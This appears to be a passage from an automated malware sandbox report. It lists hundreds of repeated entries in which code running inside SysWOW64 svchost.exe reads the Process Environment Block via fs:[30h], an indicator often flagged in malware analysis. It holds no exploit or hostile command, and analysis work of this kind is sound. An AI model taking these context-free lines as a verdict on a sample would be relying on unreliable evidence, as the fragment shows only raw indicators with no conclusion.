                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE6F2 mov eax, dword ptr fs:[00000030h]2_2_036AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE6F2 mov eax, dword ptr fs:[00000030h]2_2_036AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B06F1 mov eax, dword ptr fs:[00000030h]2_2_036B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B06F1 mov eax, dword ptr fs:[00000030h]2_2_036B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0366A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A6C7 mov eax, dword ptr fs:[00000030h]2_2_0366A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C6A6 mov eax, dword ptr fs:[00000030h]2_2_0366C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036666B0 mov eax, dword ptr fs:[00000030h]2_2_036666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03634690 mov eax, dword ptr fs:[00000030h]2_2_03634690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03634690 mov eax, dword ptr fs:[00000030h]2_2_03634690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366656A mov eax, dword ptr fs:[00000030h]2_2_0366656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366656A mov eax, dword ptr fs:[00000030h]2_2_0366656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366656A mov eax, dword ptr fs:[00000030h]2_2_0366656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638550 mov eax, dword ptr fs:[00000030h]2_2_03638550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638550 mov eax, dword ptr fs:[00000030h]2_2_03638550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]2_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]2_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]2_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]2_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]2_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]2_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E53E mov eax, dword ptr fs:[00000030h]2_2_0365E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E53E mov eax, dword ptr fs:[00000030h]2_2_0365E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E53E mov eax, dword ptr fs:[00000030h]2_2_0365E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E53E mov eax, dword ptr fs:[00000030h]2_2_0365E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E53E mov eax, dword ptr fs:[00000030h]2_2_0365E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C6500 mov eax, dword ptr fs:[00000030h]2_2_036C6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036325E0 mov eax, dword ptr fs:[00000030h]2_2_036325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C5ED mov eax, dword ptr fs:[00000030h]2_2_0366C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C5ED mov eax, dword ptr fs:[00000030h]2_2_0366C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E5CF mov eax, dword ptr fs:[00000030h]2_2_0366E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E5CF mov eax, dword ptr fs:[00000030h]2_2_0366E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036365D0 mov eax, dword ptr fs:[00000030h]2_2_036365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A5D0 mov eax, dword ptr fs:[00000030h]2_2_0366A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A5D0 mov eax, dword ptr fs:[00000030h]2_2_0366A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B05A7 mov eax, dword ptr fs:[00000030h]2_2_036B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B05A7 mov eax, dword ptr fs:[00000030h]2_2_036B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B05A7 mov eax, dword ptr fs:[00000030h]2_2_036B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036545B1 mov eax, dword ptr fs:[00000030h]2_2_036545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036545B1 mov eax, dword ptr fs:[00000030h]2_2_036545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03632582 mov eax, dword ptr fs:[00000030h]2_2_03632582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03632582 mov ecx, dword ptr fs:[00000030h]2_2_03632582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03664588 mov eax, dword ptr fs:[00000030h]2_2_03664588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E59C mov eax, dword ptr fs:[00000030h]2_2_0366E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BC460 mov ecx, dword ptr fs:[00000030h]2_2_036BC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365A470 mov eax, dword ptr fs:[00000030h]2_2_0365A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365A470 mov eax, dword ptr fs:[00000030h]2_2_0365A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365A470 mov eax, dword ptr fs:[00000030h]2_2_0365A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EA456 mov eax, dword ptr fs:[00000030h]2_2_036EA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362645D mov eax, dword ptr fs:[00000030h]2_2_0362645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365245A mov eax, dword ptr fs:[00000030h]2_2_0365245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362E420 mov eax, dword ptr fs:[00000030h]2_2_0362E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362E420 mov eax, dword ptr fs:[00000030h]2_2_0362E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362E420 mov eax, dword ptr fs:[00000030h]2_2_0362E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362C427 mov eax, dword ptr fs:[00000030h]2_2_0362C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]2_2_036B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]2_2_036B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]2_2_036B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]2_2_036B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]2_2_036B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]2_2_036B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]2_2_036B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A430 mov eax, dword ptr fs:[00000030h]2_2_0366A430
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03668402 mov eax, dword ptr fs:[00000030h]2_2_03668402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03668402 mov eax, dword ptr fs:[00000030h]2_2_03668402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03668402 mov eax, dword ptr fs:[00000030h]2_2_03668402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036304E5 mov ecx, dword ptr fs:[00000030h]2_2_036304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036364AB mov eax, dword ptr fs:[00000030h]2_2_036364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036644B0 mov ecx, dword ptr fs:[00000030h]2_2_036644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BA4B0 mov eax, dword ptr fs:[00000030h]2_2_036BA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EA49A mov eax, dword ptr fs:[00000030h]2_2_036EA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362CB7E mov eax, dword ptr fs:[00000030h]2_2_0362CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E4B4B mov eax, dword ptr fs:[00000030h]2_2_036E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E4B4B mov eax, dword ptr fs:[00000030h]2_2_036E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03702B57 mov eax, dword ptr fs:[00000030h]2_2_03702B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03702B57 mov eax, dword ptr fs:[00000030h]2_2_03702B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03702B57 mov eax, dword ptr fs:[00000030h]2_2_03702B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03702B57 mov eax, dword ptr fs:[00000030h]2_2_03702B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C6B40 mov eax, dword ptr fs:[00000030h]2_2_036C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C6B40 mov eax, dword ptr fs:[00000030h]2_2_036C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FAB40 mov eax, dword ptr fs:[00000030h]2_2_036FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D8B42 mov eax, dword ptr fs:[00000030h]2_2_036D8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03628B50 mov eax, dword ptr fs:[00000030h]2_2_03628B50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DEB50 mov eax, dword ptr fs:[00000030h]2_2_036DEB50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365EB20 mov eax, dword ptr fs:[00000030h]2_2_0365EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365EB20 mov eax, dword ptr fs:[00000030h]2_2_0365EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F8B28 mov eax, dword ptr fs:[00000030h]2_2_036F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F8B28 mov eax, dword ptr fs:[00000030h]2_2_036F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704B00 mov eax, dword ptr fs:[00000030h]2_2_03704B00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638BF0 mov eax, dword ptr fs:[00000030h]2_2_03638BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638BF0 mov eax, dword ptr fs:[00000030h]2_2_03638BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638BF0 mov eax, dword ptr fs:[00000030h]2_2_03638BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365EBFC mov eax, dword ptr fs:[00000030h]2_2_0365EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BCBF0 mov eax, dword ptr fs:[00000030h]2_2_036BCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03650BCB mov eax, dword ptr fs:[00000030h]2_2_03650BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03650BCB mov eax, dword ptr fs:[00000030h]2_2_03650BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03650BCB mov eax, dword ptr fs:[00000030h]2_2_03650BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03630BCD mov eax, dword ptr fs:[00000030h]2_2_03630BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03630BCD mov eax, dword ptr fs:[00000030h]2_2_03630BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03630BCD mov eax, dword ptr fs:[00000030h]2_2_03630BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DEBD0 mov eax, dword ptr fs:[00000030h]2_2_036DEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640BBE mov eax, dword ptr fs:[00000030h]2_2_03640BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640BBE mov eax, dword ptr fs:[00000030h]2_2_03640BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E4BB0 mov eax, dword ptr fs:[00000030h]2_2_036E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E4BB0 mov eax, dword ptr fs:[00000030h]2_2_036E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366CA6F mov eax, dword ptr fs:[00000030h]2_2_0366CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366CA6F mov eax, dword ptr fs:[00000030h]2_2_0366CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366CA6F mov eax, dword ptr fs:[00000030h]2_2_0366CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DEA60 mov eax, dword ptr fs:[00000030h]2_2_036DEA60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036ACA72 mov eax, dword ptr fs:[00000030h]2_2_036ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036ACA72 mov eax, dword ptr fs:[00000030h]2_2_036ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h]2_2_03636A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h]2_2_03636A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h]2_2_03636A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h]2_2_03636A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h]2_2_03636A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h]2_2_03636A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h]2_2_03636A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640A5B mov eax, dword ptr fs:[00000030h]2_2_03640A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640A5B mov eax, dword ptr fs:[00000030h]2_2_03640A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366CA24 mov eax, dword ptr fs:[00000030h]2_2_0366CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365EA2E mov eax, dword ptr fs:[00000030h]2_2_0365EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03654A35 mov eax, dword ptr fs:[00000030h]2_2_03654A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03654A35 mov eax, dword ptr fs:[00000030h]2_2_03654A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366CA38 mov eax, dword ptr fs:[00000030h]2_2_0366CA38
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BCA11 mov eax, dword ptr fs:[00000030h]2_2_036BCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366AAEE mov eax, dword ptr fs:[00000030h]2_2_0366AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366AAEE mov eax, dword ptr fs:[00000030h]2_2_0366AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03686ACC mov eax, dword ptr fs:[00000030h]2_2_03686ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03686ACC mov eax, dword ptr fs:[00000030h]2_2_03686ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03686ACC mov eax, dword ptr fs:[00000030h]2_2_03686ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03630AD0 mov eax, dword ptr fs:[00000030h]2_2_03630AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03664AD0 mov eax, dword ptr fs:[00000030h]2_2_03664AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03664AD0 mov eax, dword ptr fs:[00000030h]2_2_03664AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638AA0 mov eax, dword ptr fs:[00000030h]2_2_03638AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638AA0 mov eax, dword ptr fs:[00000030h]2_2_03638AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03686AA4 mov eax, dword ptr fs:[00000030h]2_2_03686AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]2_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]2_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]2_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]2_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]2_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]2_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]2_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]2_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]2_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704A80 mov eax, dword ptr fs:[00000030h]2_2_03704A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03668A90 mov edx, dword ptr fs:[00000030h]2_2_03668A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03656962 mov eax, dword ptr fs:[00000030h]2_2_03656962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03656962 mov eax, dword ptr fs:[00000030h]2_2_03656962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03656962 mov eax, dword ptr fs:[00000030h]2_2_03656962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0367096E mov eax, dword ptr fs:[00000030h]2_2_0367096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0367096E mov edx, dword ptr fs:[00000030h]2_2_0367096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0367096E mov eax, dword ptr fs:[00000030h]2_2_0367096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D4978 mov eax, dword ptr fs:[00000030h]2_2_036D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D4978 mov eax, dword ptr fs:[00000030h]2_2_036D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BC97C mov eax, dword ptr fs:[00000030h]2_2_036BC97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B0946 mov eax, dword ptr fs:[00000030h]2_2_036B0946
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704940 mov eax, dword ptr fs:[00000030h]2_2_03704940
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B892A mov eax, dword ptr fs:[00000030h]2_2_036B892A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C892B mov eax, dword ptr fs:[00000030h]2_2_036C892B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE908 mov eax, dword ptr fs:[00000030h]2_2_036AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE908 mov eax, dword ptr fs:[00000030h]2_2_036AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BC912 mov eax, dword ptr fs:[00000030h]2_2_036BC912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03628918 mov eax, dword ptr fs:[00000030h]2_2_03628918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03628918 mov eax, dword ptr fs:[00000030h]2_2_03628918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BE9E0 mov eax, dword ptr fs:[00000030h]2_2_036BE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036629F9 mov eax, dword ptr fs:[00000030h]2_2_036629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036629F9 mov eax, dword ptr fs:[00000030h]2_2_036629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C69C0 mov eax, dword ptr fs:[00000030h]2_2_036C69C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h]2_2_0363A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h]2_2_0363A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h]2_2_0363A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h]2_2_0363A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h]2_2_0363A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h]2_2_0363A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036649D0 mov eax, dword ptr fs:[00000030h]2_2_036649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FA9D3 mov eax, dword ptr fs:[00000030h]2_2_036FA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036309AD mov eax, dword ptr fs:[00000030h]2_2_036309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036309AD mov eax, dword ptr fs:[00000030h]2_2_036309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B89B3 mov esi, dword ptr fs:[00000030h]2_2_036B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B89B3 mov eax, dword ptr fs:[00000030h]2_2_036B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B89B3 mov eax, dword ptr fs:[00000030h]2_2_036B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BE872 mov eax, dword ptr fs:[00000030h]2_2_036BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BE872 mov eax, dword ptr fs:[00000030h]2_2_036BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C6870 mov eax, dword ptr fs:[00000030h]2_2_036C6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C6870 mov eax, dword ptr fs:[00000030h]2_2_036C6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03660854 mov eax, dword ptr fs:[00000030h]2_2_03660854
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03634859 mov eax, dword ptr fs:[00000030h]2_2_03634859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03634859 mov eax, dword ptr fs:[00000030h]2_2_03634859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03652835 mov eax, dword ptr fs:[00000030h]2_2_03652835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03652835 mov eax, dword ptr fs:[00000030h]2_2_03652835
